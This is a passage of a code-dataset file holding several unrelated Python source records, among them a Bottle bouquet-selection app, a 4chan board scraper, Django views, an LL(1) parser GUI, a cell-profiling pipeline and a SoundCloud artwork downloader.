tip=stanje.tip(),\n barva=stanje.barva(),\n roze=stanje.roze(),\n uporabnisko_ime=bottle.request.get_cookie(\"uporabnisko_ime\"),\n )\n\n\n@bottle.get(\"/prijava/\")\ndef prijava_get():\n return bottle.template(\"prijava.html\", napake={}, polja={}, uporabnisko_ime=None)\n\n\n@bottle.post(\"/prijava/\")\ndef prijava_post():\n uporabnisko_ime = bottle.request.forms.getunicode(\"uporabnisko_ime\")\n bottle.response.set_cookie(\"uporabnisko_ime\", uporabnisko_ime, path=\"/\")\n bottle.redirect(\"/\")\n\n\n@bottle.post(\"/odjava/\")\ndef odjava_post():\n bottle.response.delete_cookie(\"uporabnisko_ime\", path=\"/\")\n print(\"piškotek uspešno pobrisan\")\n bottle.redirect(\"/\")\n\n\n@bottle.post(\"/izberi/\")\ndef izberi_svoj_sanjski_aranžma():\n namen = bottle.request.forms.getunicode(\"namen\")\n tip = bottle.request.forms.getunicode(\"tip\")\n barva = bottle.request.forms.getunicode(\"barva\")\n roza = bottle.request.forms.getunicode(\"roza\") \n print(namen)\n izbira = Sopek(namen, tip, barva,roza)\n stanje = izbira()\n stanje.dodaj_izbiro(izbira)\n shrani_izbiro(izbira)\n bottle.redirect(\"/\")\n\n\n\n\n@bottle.post(\"/pokazi izbrano/\")\ndef pokazi_izbrano():\n indeks = bottle.request.forms.getunicode(\"indeks\")\n stanje = izberi_svoj_sanjski_aranžma()\n bottle.redirect(\"/https://drive.google.com/drive/folders/17m8-n03kBdhueTJ6-yuDrOv9hwd1rw47?usp=sharing\")\n\n\n\n\n@bottle.error(404)\ndef error_404(error):\n return \"Ta stran ne obstaja!\"\n\n\nbottle.run(reloader=True, debug=True)","sub_path":"staro/spletni_vmesnik.py","file_name":"spletni_vmesnik.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"103219640","text":"import time\nfrom random import shuffle, sample\nfrom re import search, findall\nfrom data import Post\nfrom utils.chandata import ChanBoards\nfrom utils.operations import getThreadIdsFromCatalog, getThread, getCommentsFromThreadAsList, removeHTMLFromComment\nimport db\n\nboards = ['pol',\n 'vg',\n 'v',\n 'b',\n 'biz',\n 'int',\n 'a',\n 'tv',\n 'vt',\n 'trash',\n 'mu',\n 'fit',\n 'r9k',\n 'g',\n 'x',\n 'his',\n 'adv',\n 'lit',\n 'bant',\n 'ck',\n 'qa',\n 'aco',\n 'mlp',\n 'vrpg',\n 
'soc',\n 'vr',\n 's4s'\n]\n\nshuffle(boards)\n\ndef scrapeBoard(board: str) -> None:\n\n threadsIdList = getThreadIdsFromCatalog(board)\n if not threadsIdList: exit()\n \n print(f\"Beginning {board}, total threads {len(threadsIdList)}\")\n\n for threadIndex, threadId in enumerate(threadsIdList):\n \n delta = 0\n timePast = time.time() \n\n thread = getThread(board, threadId)\n \n if thread: \n for comment in getCommentsFromThreadAsList(thread):\n db.addPost(board,Post(comment))\n \n delta = time.time() - timePast\n print(board, threadIndex, \"/\", len(threadsIdList), delta)\n \n db.con.commit()\n\n\nfor board in boards:\n scrapeBoard(board)\ndb.con.close()\n\n\n","sub_path":"linkfarmer.py","file_name":"linkfarmer.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"272248873","text":"from django.shortcuts import render, HttpResponse\nfrom blog.models import Person\nfrom django.template import Context, Template\nfrom blog.models import Jike\nfrom django.core.paginator import Paginator\n# Create your views here.\n\n\ndef hello(request):\n return HttpResponse(\"Hello world\")\n\n\ndef index(request):\n return render(request, \"index.html\" )\n\n\ndef first_try(request):\n person = Person(name=\"xiewei\", job=\"student\")\n html = '''\n \n \n \n \n \n
hello ,{{person.name}}\n my job is , {{person.job}}\n
    \n \n \n '''\n t = Template(html)\n c = Context({\"person\": person})\n web_page = t.render(c)\n return HttpResponse(web_page)\n\n\ndef index2(request):\n limit = 4\n daomu = Jike.objects[:20]\n p = Paginator(daomu, limit)\n page = request.GET.get(\"page\", 1)\n page_content = p.page(page)\n context = {\n \"passage\": page_content\n }\n return render(request, \"one.html\", context=context)\n\n\ndef index3(request):\n limit = 5\n daomu = Jike.objects[:20]\n p = Paginator(daomu, limit)\n page = request.GET.get(\"page\", 1)\n page_content = p.page(page)\n context = {\n \"passage\": page_content\n }\n return render(request, \"four.html\", context=context)\n","sub_path":"Learn_Django/pure_blog/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"485717954","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nfrom Tkinter import *\nfrom tkFont import *\nfrom FileDialog import *\nfrom ScrolledText import ScrolledText\nfrom lexer import lexer_analysis\n\ngrammar = {}\nterminal = []\nnonterminal = []\nfirst = {}\nfollow = {}\nparsing_table = {}\ntoken = []\ntoken_attr = []\nleaf_tab = {}\n\ndef fileloader():\n\tglobal root\n\tcode.delete(1.0, END)\n\tfd = LoadFileDialog(root)\n\tfilename = fd.go()\n\tfin = open(filename, \"r\")\n\tinput_file = fin.read()\n\tfin.close()\n\tcode.insert(1.0, input_file)\n\ndef grammar_scanner():\n\tgrammarIn = open('grammar.ds', 'r')\n\tgrammar_lines = grammarIn.readlines()\n\tgrammarIn.close()\n\n\tfor line in grammar_lines:\n\t\tline_terminal = []\n\t\tline_nonterminal = []\n\t\tgrammar_sequence = []\n\t\ttemp = \"\"\n\n\t\tline = line.strip()\n\t\ttags = line.split(\"\\t->\\t\")\n\t\tif tags[0] is not None:\n\t\t\ttags[0] = tags[0][1:len(tags[0])-1]\n\t\t\tline_nonterminal.append(tags[0])\n\t\t\tgrammar_sequence.append(tags[0])\n\t\ti = 0\n\t\twhile i < len(tags[1]):\n\t\t\tif tags[1][i] == '<':\n\t\t\t\ti += 1\n\t\t\t\twhile tags[1][i] != '>':\n\t\t\t\t\ttemp += tags[1][i]\n\t\t\t\t\ti = i +1\n\t\t\t\tline_nonterminal.append(temp)\n\t\t\t\tgrammar_sequence.append(temp)\n\t\t\t\ttemp = \"\"\n\t\t\telif tags[1][i] == '[':\n\t\t\t\ti = i + 1\n\t\t\t\twhile tags[1][i] != ']':\n\t\t\t\t\ttemp += tags[1][i]\n\t\t\t\t\ti += 1\n\t\t\t\t\n\t\t\t\tif i != len(tags[1]) - 1 and tags[1][i+1] == ']':\n\t\t\t\t\ttemp += tags[1][i]\n\t\t\t\t\ti += 1\n\t\t\t\tline_terminal.append(temp)\n\t\t\t\tgrammar_sequence.append(temp)\n\t\t\t\ttemp = \"\"\n\t\t\ti += 1\n\t\tif grammar_sequence[0] not in grammar:\n\t\t\tgrammar[grammar_sequence[0]] = []\n\t\tgrammar[grammar_sequence[0]].append(grammar_sequence[1:len(grammar_sequence)])\n\t\tfor each in line_nonterminal:\n\t\t\tif each not in nonterminal:\n\t\t\t\tnonterminal.append(each)\n\t\t\t\tleaf_tab[each] = 0\n\t\tfor each in line_terminal:\n\t\t\tif each not in terminal:\n\t\t\t\tterminal.append(each)\n\tterminal.append('$')\n\ndef getFirst():\n\tglobal grammar\n\tglobal terminal\n\tglobal nonterminal\n\tglobal first\n\n\tfor ter in terminal:\n\t\tfirst[ter] = [ter]\n\tfor nonter in nonterminal:\n\t\tfirst[nonter] = []\n\t\tfor sequence in grammar[nonter]:\n\t\t\tif sequence == ['null']:\n\t\t\t\tfirst[nonter] = ['null']\n\n\tstopFlag = False\n\twhile(not stopFlag):\n\t\tstopFlag = True\n\t\tfor nonter in nonterminal:\n\t\t\tfor sequence in grammar.get(nonter, []):\n\t\t\t\tcounter = 0\n\t\t\t\tfor tag in sequence:\n\t\t\t\t\tfor tagFirst in first[tag]:\n\t\t\t\t\t\tif tagFirst != 'null' and 
tagFirst not in first[nonter]:\n\t\t\t\t\t\t\tfirst[nonter].append(tagFirst)\n\t\t\t\t\t\t\tstopFlag = False\n\t\t\t\t\tif 'null' not in first[tag]:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tcounter += 1\n\t\t\t\tif counter == len(sequence) and 'null' not in first[nonter]:\n\t\t\t\t\tfirst[nonter].append('null')\n\t\t\t\t\tstopFlag = False\n\n\t#print first\n\ndef getFollow():\n\tglobal grammar\n\tglobal terminal\n\tglobal nonterminal\n\tglobal first\n\tglobal follow\n\n\tfollow['program'] = ['$']\n\tfor ter in terminal:\n\t\tfollow[ter] = []\n\tfor nonter in nonterminal:\n\t\tfollow[nonter] = []\n\n\tfor nonter in nonterminal:\n\t\tfor sequence in grammar[nonter]:\n\t\t\tfor i in xrange(0,len(sequence)-1):\n\t\t\t\tfor next_first in first[sequence[i+1]]:\n\t\t\t\t\tif next_first != 'null' and next_first not in follow[sequence[i]]:\n\t\t\t\t\t\tfollow[sequence[i]].append(next_first)\n\n\tstopFlag = False\n\twhile(not stopFlag):\n\t\tstopFlag = True\n\t\tfor nonter in nonterminal:\n\t\t\tfor sequence in grammar[nonter]:\n\t\t\t\tfor i in xrange(0,len(sequence)-1):\n\t\t\t\t\tfor each_follow in follow[nonter]:\n\t\t\t\t\t\tif each_follow not in follow[sequence[i]]:\n\t\t\t\t\t\t\tfollow[sequence[i]].append(each_follow)\n\t\t\t\t\t\t\tstopFlag = False\n\t\t\t\t\tif 'null' not in first[sequence[i]]:\n\t\t\t\t\t\tbreak\n\n\t#print follow\n\ndef get_parsing_table():\n\tglobal first\n\tglobal follow\n\tglobal parsing_table\n\tfor nonter in nonterminal:\n\t\tparsing_table[nonter] = {}\n\t\tfor ter in terminal:\n\t\t\tparsing_table[nonter][ter] = -2\n\t\n\tfor nonter in nonterminal:\n\t\tfor i in xrange(0,len(grammar[nonter])):\n\t\t\tcounter = 0\n\t\t\tfor tag in grammar[nonter][i]:\n\t\t\t\tfor each_first in first[tag]:\n\t\t\t\t\tif parsing_table[nonter][each_first] < 0:\n\t\t\t\t\t\tparsing_table[nonter][each_first] = i\n\t\t\t\tif 'null' not in first[tag]:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcounter += 1\n\t\t\tif counter == len(grammar[nonter][i]):\n\t\t\t\tfor each_follow in follow[nonter]:\n\t\t\t\t\tif each_follow in terminal:\n\t\t\t\t\t\tif parsing_table[nonter][each_follow] < 0:\n\t\t\t\t\t\t\tparsing_table[nonter][each_follow] = i\n\t# entries in the synchronization set are marked -1\n\tfor nonter in nonterminal:\n\t\tfor each_follow in follow[nonter]:\n\t\t\tif parsing_table[nonter][each_follow] < 0:\n\t\t\t\tparsing_table[nonter][each_follow] = -1\n\t#print parsing_table\n\nsyntax_result = []\n\ndef syntax_analysis():\n\tglobal parsing_table\n\tglobal syntax_result\n\tglobal token\n\tglobal token_attr\n\tglobal code\n\tstack = range(1000)\n\tstack[0] = 'program'\n\ttab = range(1000)\n\ttab[0] = 0\n\tleaf_tab['program'] = 0\n\tstack_top = 0\n\ttoken_pointer = 0\n\n\tanalysis.delete(1.0, END)\n\tsyntax_result = []\n\ttoken = []\n\ttoken_attr = []\n\n\tinput_raw = code.get(1.0, END)\n\tinput_str = input_raw.split(\"\\n\")\n\tinput_lines = lexer_analysis(input_str)\n\tfor lines in input_lines:\n\t\ttags = lines.split('\\t')\n\t\twhile tags.count('') > 0:\n\t\t\ttags.remove('')\n\t\tif(len(tags) != 0):\n\t\t\tif(tags[0] == 'SEP' or tags[0] == 'OP'):\n\t\t\t\ttoken.append(tags[1])\n\t\t\telse:\n\t\t\t\ttoken.append(tags[0])\n\t\t\ttoken_attr.append(tags[1])\n\n\twhile(stack_top >= 0):\n\t\tif(token_pointer >= len(token)):\n\t\t\tsyntax_result.append('error:程序结构不完整,编译失败')\n\t\t\tbreak\n\t\tif(stack[stack_top] in terminal):\n\n\t\t\tif stack[stack_top] == token[token_pointer]:\n\t\t\t\tif token[token_pointer] not in (\"IDN\", \"INUM\", \"FNUM\"):\n\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'leaf:[' + 
token[token_pointer] + ']')\n\t\t\t\telse:\n\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'leaf:[' + token[token_pointer] + \":\" + token_attr[token_pointer] + ']')\n\n\t\t\t\t#print 'leaf:[' + token[token_pointer] + ']'\n\t\t\telse:\n\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'error:不可接受的终结符:[' + token[token_pointer] + ']')\t\t\n\t\t\tstack_top -= 1\n\t\t\ttoken_pointer += 1\n\t\telse:\n\t\t\tif parsing_table[stack[stack_top]][token[token_pointer]] < 0:\n\t\t\t\tif ['Lambda'] in grammar[stack[stack_top]]:\n\t\t\t\t\t#syntax_result.append('success: [' + stack[stack_top] + ']\\t->\\t[Lambda]')\n\t\t\t\t\tstack_top -= 1\n\t\t\t\telse:\n\t\t\t\t\tif parsing_table[stack[stack_top]][token[token_pointer]] == -1:\n\t\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'error: [' + token[token_pointer] + ']不可接受,进入同步恢复状态,栈顶元素为:'+stack[stack_top])\n\t\t\t\t\t\tstack_top -= 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'error: [' + token[token_pointer] + ']不可接受,忽略该符号以恢复错误')\n\t\t\t\t\t\ttoken_pointer += 1\n\t\t\telse:\n\t\t\t\ttmp_sequence = grammar[stack[stack_top]][parsing_table[stack[stack_top]][token[token_pointer]]]\n\t\t\t\t\n\t\t\t\ttmp_str = ' ' * tab[stack_top] + 'success: [' + stack[stack_top] + ']\\t->\\t'\n\t\t\t\ttab_temp = tab[stack_top]\n\t\t\t\tstack_top -= 1\n\t\t\t\tfor x in xrange(0,len(tmp_sequence)):\n\t\t\t\t\ttmp_str = tmp_str + '[' + tmp_sequence[x] +']'\n\t\t\t\t\tstack_top += 1\n\t\t\t\t\tstack[stack_top] = tmp_sequence[len(tmp_sequence) - 1 - x]\n\t\t\t\t\ttab[stack_top] = tab_temp + 1\n\t\t\t\tsyntax_result.append(tmp_str)\n\t\t\t\t\t\n\t\tif token_pointer == len(token):\n\t\t\tbreak\t\n\tfor each in syntax_result:\n\t\tanalysis.insert(END,each + '\\n')\n\n\nroot = Tk()\ncode = ScrolledText(root, width=50, height=30, font=15)\nanalysis = ScrolledText(root, width=200, height=30, font=10)\n\ndef interface():\n\tglobal root\n\tglobal code\n\tglobal analysis\n\tt = StringVar()\n\tt.set('Syntax by LiTianbao')\n\tlabel = Label(root, textvariable = t, font=15)\n\tAnalysis = Button(root, text = 'Syntax Analysis', command = syntax_analysis, font=15)\n\tload = Button(root, text = ' Load code ', command = fileloader, font=15)\n\troot.title(\"Syntax\")\n\t#root.geometry('1500x800')\n\tlabel.pack(side = TOP)\n\tAnalysis.pack(side = BOTTOM)\n\tload.pack(side = BOTTOM)\n\tcode.pack(side = LEFT)\n\tanalysis.pack(side = RIGHT)\n\troot.mainloop()\n\ndef main():\n\tglobal token\n\t#read token from lexer\n\tgrammar_scanner()\n\tgetFirst()\n\tgetFollow()\n\tget_parsing_table()\n\tinterface()\n\t#syntax_analysis()\n\t\nif __name__ == '__main__':\n\tmain()","sub_path":"syntax.py","file_name":"syntax.py","file_ext":"py","file_size_in_byte":7979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"463456136","text":"\"\"\"\nPerform the profiling pipeline (defined in profile.py) given all plates.\n\"\"\"\n\n# Copied from https://github.com/broadinstitute/lincs-cell-painting/blob/master/profiles/profiling_pipeline.py\n\nimport os\nimport pathlib\nimport subprocess\nimport pandas as pd\nfrom profile_utils import get_pipeline_args, find_incomplete_plates\n\n# Load Command Line Arguments\nargs = get_pipeline_args()\noverwrite = args.overwrite # The default is False\n\n# Load constants\nproject = \"2019_07_11_JUMP-CP\"\nbatches = [\n \"2020_06_25_Stain2_Batch2_Binned\",\n \"2020_06_25_Stain2_Batch2_Confocal\",\n \"2020_06_25_Stain2_Batch2_MitoCompare\",\n \"2020_06_25_Stain2_Batch2_Multiplane\",\n 
\"2020_06_25_Stain2_Batch2_Redone\",\n \"2020_06_25_Stain2_Batch2_Repeat\",\n \"2020_06_25_Stain2_Batch2_Standard\",\n \"2020_08_11_Stain3_Bin1\",\n\t\"2020_08_11_Stain3_HighExp\",\n\t\"2020_08_11_Stain3_Multiplane\",\n\t\"2020_08_11_Stain3_Standard\",\n\t\"2020_08_11_Stain3_Yokogawa\",\n\t\"2020_09_22_Stain4_Bin1\",\n\t\"2020_09_22_Stain4_Bray\",\n\t\"2020_09_22_Stain4_Bray_HighExp\",\n\t\"2020_09_22_Stain4_HighExp\",\n\t\"2020_09_22_Stain4_Standard\",\n\t\"2020_10_02_RestainedCell1\"\n]\n\nfor batch in batches:\n single_cell_dir = pathlib.PurePath(f\"../../single_cell/\")\n profile_dir = pathlib.PurePath(f\"../../profiles/{batch}\")\n barcode_platemap_dir = pathlib.PurePath(f\"../../metadata/platemaps/{batch}\")\n output_base_dir = pathlib.PurePath(f\"../../profiles/{batch}\")\n completed_file_match = \"normalized_feature_select.csv.gz\"\n\n # Load barcode platemap information\n barcode_platemap_file = pathlib.PurePath(\n barcode_platemap_dir, \"barcode_platemap.csv\"\n )\n barcode_platemap_df = pd.read_csv(barcode_platemap_file)\n\n # Load platemap information\n platemap_dir = pathlib.PurePath(barcode_platemap_dir, \"platemap\")\n\n # Load plate information\n plate_dir = pathlib.PurePath(single_cell_dir, batch)\n # plates = [x for x in os.listdir(plate_dir) if x.startswith(\"BR\")]\n plates = [x for x in os.listdir(plate_dir)]\n\n if not overwrite:\n # Only process plates that are not already completely processed\n plates = find_incomplete_plates(\n plates=plates, output_dir=output_base_dir, file_match=completed_file_match\n )\n\n # Load and check MOA information\n moa_file = pathlib.PurePath(\n \"../../metadata/moa/repurposing_info_external_moa_map_resolved.tsv\"\n )\n moa_df = pd.read_csv(moa_file, sep=\"\\t\")\n assert isinstance(\n moa_df, pd.DataFrame\n ), \"Error, MOA file does not exist. Is the path updated?\"\n\n # Process every plate\n for plate in plates:\n print(f\"Now processing... 
Plate: {plate}\")\n output_dir = pathlib.Path(output_base_dir, plate)\n output_dir.mkdir(parents=True, exist_ok=True)\n cell_count_dir = pathlib.Path(\"../../cell_count\", batch, plate)\n cell_count_dir.mkdir(parents=True, exist_ok=True)\n\n platemap_id = barcode_platemap_df.query(\n \"Assay_Plate_Barcode == @plate\"\n ).Plate_Map_Name.values[0]\n\n platemap_file = pathlib.PurePath(platemap_dir, f\"{platemap_id}.txt\")\n sql_base = pathlib.PurePath(single_cell_dir, batch, plate, f\"{plate}.sqlite\")\n sql_file = f\"sqlite:////{sql_base}\"\n\n cmd = [\n \"python\",\n \"profile.py\",\n \"--sql_file\",\n sql_file,\n \"--batch\",\n batch,\n \"--plate_name\",\n plate,\n \"--platemap_file\",\n platemap_file,\n \"--barcode_platemap_file\",\n barcode_platemap_file,\n \"--moa_file\",\n moa_file,\n \"--output_dir\",\n output_dir,\n \"--cell_count_dir\",\n cell_count_dir,\n ]\n\n subprocess.call(cmd)\n","sub_path":"profiles/profiling_pipeline.py","file_name":"profiling_pipeline.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"405446295","text":"from os import walk\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup as bs\nfrom tqdm import tqdm\nimport requests\nimport urllib.request\nimport time\nimport re\n\n\ndebug = False\n\n# # # # # DEFINITIONS # # # # #\n\n# Objective: Extract mp3 filenames within a specified folder path and append them to a list.\n# Parameters: 'path' - (String) target folder path\n# Return: formatted list of songs (%author% - %title%) without file extension and replacing '&' symbol with '%26'\n# NOTE: Presence of the '&' symbol in filename prevents correct SoundCloud search queries, use '%26' as it holds the\n# same value in the SoundCloud system. 
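The '&' to '%26' substitution described in this NOTE is hand-rolled URL percent-encoding; a minimal sketch of the same effect using the standard library (urllib.parse.quote is not what the script itself uses, so this is an illustrative aside, and make_query_url is a hypothetical helper name):

# quote() percent-encodes reserved characters in one pass:
# '&' becomes '%26' and spaces become '%20'.
from urllib.parse import quote

def make_query_url(song):
    return 'https://soundcloud.com/search?q=' + quote(song)

# make_query_url('Simon & Garfunkel - The Boxer')
# -> 'https://soundcloud.com/search?q=Simon%20%26%20Garfunkel%20-%20The%20Boxer'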
This will have to be reversed later when adding cover art metadata.\ndef get_mp3_filenames(path):\n # extracts filenames from folder with extensions\n global total_songs\n info_list = []\n for dirpath, dirnames, filenames in walk(path):\n info_list = filenames\n # removes filename extensions from each song and replaces '&' with '%26'\n for song_info in info_list:\n song_list.append(os.path.splitext(song_info.replace('&', '%26'))[0])\n total_songs += 1\n return song_list\n\n\n# Objective: Generate SoundCloud search strings given a list of songs.\n# Parameters: 'songs' - (String List) list of songs ==> result of 'get_mp3_filenames()'\n# Return: list of SoundCloud search query urls for each song\ndef create_query_urls(songs):\n global total_query_urls\n query_urls = []\n for song in songs:\n \"%20\".join(song.split(\" \")) # replace every space in 'song' with '%20'\n query_urls.append(\"https://soundcloud.com/search?q=\" + song)\n total_query_urls += 1\n return query_urls\n\n\n# Objective: Scrape SoundCloud search query urls for urls of first song result.\n# Parameters: 'query_urls' - (String List) list of SoundCloud search query urls ==> result of 'create_query_urls()'\n# Return: list of SoundCloud song urls\ndef get_first_result(query_urls):\n global total_song_urls\n scrape_progress = tqdm(total=len(query_urls), position=0, leave=True)\n song_urls = []\n\n for url in query_urls:\n scrape_progress.set_description(\"Scraping SoundCloud for song urls...\")\n local_url_list = []\n response = requests.get(url)\n soup = bs(response.content, \"html.parser\")\n time.sleep(0.1)\n\n for local_url in soup.findAll('a', attrs={'href': re.compile(\"^/\")}):\n local_url_list.append(local_url.get('href'))\n song_urls.append(\"https://soundcloud.com\" + local_url_list[5])\n\n # debug: prints all local urls in SoundCloud page source\n if debug:\n print(local_url_list)\n\n total_song_urls += 1\n scrape_progress.update()\n scrape_progress.close()\n return song_urls\n\n\n# Objective: Scrape SoundCloud song urls for artwork covers.\n# Parameters: 'song_urls' - (String List) list of SoundCloud song urls ==> result of 'get_first_result()'\n# Return: list of artwork urls\ndef get_artwork_urls(song_urls):\n download_progress = tqdm(total=len(song_urls), position=0, leave=True)\n global total_artwork_urls\n artwork_urls = []\n\n for song_num, url in enumerate(song_urls):\n download_progress.set_description(\"Scraping SoundCloud for artwork urls...\")\n try:\n soup = bs(requests.get(url).content, 'html.parser')\n time.sleep(0.5)\n target_url = soup.find('img')['src']\n if target_url == '':\n print('\\nSorry. There was an error getting the image url for song (' + str(song_num + 1) + ').')\n print('Possible reason: Target song exists but with no attached artwork cover.')\n print('Associated song name: ' + song_list[song_num])\n print('Associated url: ' + url + '\\n')\n artwork_urls.append('Error occurred.')\n download_progress.update()\n continue\n artwork_urls.append(target_url.replace('t500x500','t3000x3000'))\n total_artwork_urls += 1\n download_progress.update()\n except Exception:\n print('\\nSorry. 
There was an error getting the image url for song ('+str(song_num+1)+').')\n print('Possible reason: Target song does not exist with given url.')\n print('Associated song name: ' + song_list[song_num])\n print('Associated url: '+url+'\\n')\n artwork_urls.append('Error occurred.')\n download_progress.update()\n download_progress.close()\n return artwork_urls\n\n\n# Objective: Download artwork covers to folder destination.\n# Parameters: 'artwork_urls' - (String List) list of artwork urls ==> result of 'get_artwork_urls'\n# 'download_path' - (String) download destination\n# 'song_filenames' - (String List) list of song filenames ==> result of 'get_mp3_filenames()'\n# Return: None\ndef download_artwork(artwork_urls, download_path, song_filenames):\n download_progress = tqdm(total=len(artwork_urls), position=0, leave=True)\n global total_downloaded_artwork\n\n for song_num, url in enumerate(artwork_urls):\n download_progress.set_description(\"Downloading artwork...\")\n if url == 'Error occurred.':\n download_progress.update()\n continue\n full_path = download_path + '\\\\' + song_filenames[song_num] + '.jpg'\n urllib.request.urlretrieve(url, full_path)\n total_downloaded_artwork += 1\n download_progress.update()\n time.sleep(0.5)\n download_progress.close()\n\n\n# Objective: Print elements of list (newlines) to console\n# Parameters: '_list' - (String List) list of Strings\n# Return: None\ndef print_results(_list):\n print(\"Results: \")\n for element_index in range(len(_list)):\n print(\"(\" + str(element_index + 1) + \")\" + _list[element_index])\n\n\n# Objective: Replace all instances of '%26' in mp3 filenames with '&'\n# Parameters: 'song_filenames' - (String List) list of song filenames ==> result of 'get_mp3_filenames()'\n# Return: None\ndef replace_with_ampersand(song_filenames):\n for num, song in enumerate(song_filenames):\n song_filenames[num] = song.replace('%26', '&')\n return song_filenames\n\n# # # # # EXECUTION # # # # #\n\nprint(\"\\n*BEWARE* This program may not correctly download artwork for songs \\nthat contain non-alphanumerical characters (I'm looking at you, weebs!)\\n\")\nprint(\"\"\"\n-HOW TO USE-\n(1) Locate the folder containing your mp3 files.\n(2) Paste the folder path below.\n(3) Locate/create a folder for downloading artwork.\n(4) Paste download folder path when prompted to.\n*Please Note* Should this program exit prematurely any and all download progress will be lost.\n\"\"\")\n# tracker variables\ntotal_songs = 0\ntotal_query_urls = 0\ntotal_song_urls = 0\ntotal_artwork_urls = 0\ntotal_downloaded_artwork = 0\n\n# Process (5-steps)\n# (1) Prompt user for folder path\nfolder_path = input(\"\\nEnter a folder path: \")\n\n# (2) Get song filenames\nsong_list = []\nsong_list = get_mp3_filenames(folder_path)\nprint(\"(\" + str(total_songs) + \") \" + \"Songs discovered in [\"+folder_path+\"].\")\ndownload_folder_path = input(\"Enter download location: \")\n#print_results(song_list)\n\n# (3) Create SoundCloud query urls\ntime.sleep(0.1)\nprint(\"\\nCreating SoundCloud urls...\")\n_query_urls = create_query_urls(song_list)\nprint(\"(\"+str(total_query_urls)+\"/\"+str(total_songs)+\") \"+\"SoundCloud query urls successfully created.\\n\")\n\n# (4) Get SoundCloud song urls\ntime.sleep(0.1)\n_song_urls = get_first_result(_query_urls)\nprint(\"(\"+str(total_song_urls)+\"/\"+str(total_songs)+\") \"+\"Song urls successfully scraped from SoundCloud.\\n\")\n#print_results(scraped_urls)\n\n# (5) Get artwork urls\ntime.sleep(0.1)\n_artwork_urls = 
get_artwork_urls(_song_urls)\n#print_results(_artwork_urls)\nprint(\"(\"+str(total_artwork_urls)+\"/\"+str(total_songs)+\") \"+\"Artwork urls successfully scraped from SoundCloud.\\n\")\n\n# (6) Download artwork\ntime.sleep(0.1)\nreplace_with_ampersand(song_list)\ndownload_artwork(_artwork_urls, download_folder_path, song_list)\nprint(\"(\"+str(total_downloaded_artwork)+\"/\"+str(total_songs)+\") \"+\"Artwork successfully downloaded from SoundCloud to [\"+download_folder_path+\"].\")\ninput(\"Press enter to continue...\")","sub_path":"ArtworkDownloader.py","file_name":"ArtworkDownloader.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"153873120","text":"import os\nimport csv\n\n\n#MAKING FOLDERS FROM DICTIONARY\ndef writecsv(movs):\n\tcurdir = os.getcwd()\n\n\tif not os.path.isdir(os.path.join(curdir, \"Movies\")):\n\t\tos.mkdir(\"Movies\")\n\n\tmoviedir = os.path.join(curdir, \"Movies\")\n\tos.chdir(moviedir)\n\n\tfor i in movs:\n\t\tif not os.path.isdir(os.path.join(os.getcwd(), i)):\n\t\t\tos.mkdir(i)\n\t\tdatedir = os.path.join(os.getcwd(), i)\n\t\tos.chdir(datedir)\n\n\t\tfor j in movs[i]:\n\t\t\tif not os.path.isdir(os.path.join(os.getcwd(), j)):\n\t\t\t\tos.mkdir(j)\n\n\t\t\ttimedir = os.path.join(os.getcwd(), j)\n\t\t\tos.chdir(timedir)\n\n\t\t\tfor k in movs[i][j]:\n\t\t\t\tif not os.path.isdir(os.path.join(os.getcwd(), k)):\n\t\t\t\t\tos.mkdir(k)\n\t\t\t\tseatsdir = os.path.join(os.getcwd(), k)\n\t\t\t\tos.chdir(seatsdir)\n\n\t\t\t\tif movs[i][j][k]:\n\t\t\t\t\twith open(\"seats.csv\", 'w') as seatmap:\n\t\t\t\t\t\twritingob = csv.writer(seatmap)\n\t\t\t\t\t\tfor n in movs[i][j][k]:\n\t\t\t\t\t\t\twritingob.writerow([n])\n\n\t\t\t\tif(os.path.exists('seats.csv') and (len(movs[i][j][k])==0)):\n\t\t\t\t\tos.remove('seats.csv')\n\n\t\t\t\tos.chdir(timedir)\n\n\t\t\tos.chdir(datedir)\n\n\t\tos.chdir(moviedir)\n\n\tos.chdir(curdir)\n\n\n\n\n#MAKING DICTIONARY OUT OF DIRECTORIES\n\n#IF YOU ADD MOVIES BY SLOT THEN IT WILL SURELY MAKE DICTIONARY\ndef readcsv():\n\tmovs = dict()\n\n\tcurdir = os.getcwd()\n\n\tmoviedir = os.path.join(curdir, \"Movies\")\n\tos.chdir(moviedir)\n\n\tmovies = os.listdir(os.getcwd())\n\n\tfor i in movies:\n\t\tmovs[i] = dict()\n\n\t\tdatedir = os.path.join(os.getcwd(), i)\n\t\tos.chdir(datedir)\n\n\t\tdates = os.listdir(os.getcwd())\n\t\tfor j in dates:\n\t\t\tmovs[i][j] = dict()\n\n\t\t\ttimedir = os.path.join(os.getcwd(), j)\n\t\t\tos.chdir(timedir)\n\n\t\t\ttimes = os.listdir(os.getcwd())\n\t\t\tfor k in times:\n\t\t\t\tmovs[i][j][k] = []\n\n\t\t\t\tseatdir = os.path.join(os.getcwd(), k)\n\t\t\t\tos.chdir(seatdir)\n\n\t\t\t\tif(os.path.exists(\"seats.csv\")):\n\t\t\t\t\twith open(\"seats.csv\", \"r\") as readfile:\n\t\t\t\t\t\tfile_reader = csv.reader(readfile)\n\n\t\t\t\t\t\tfor line in 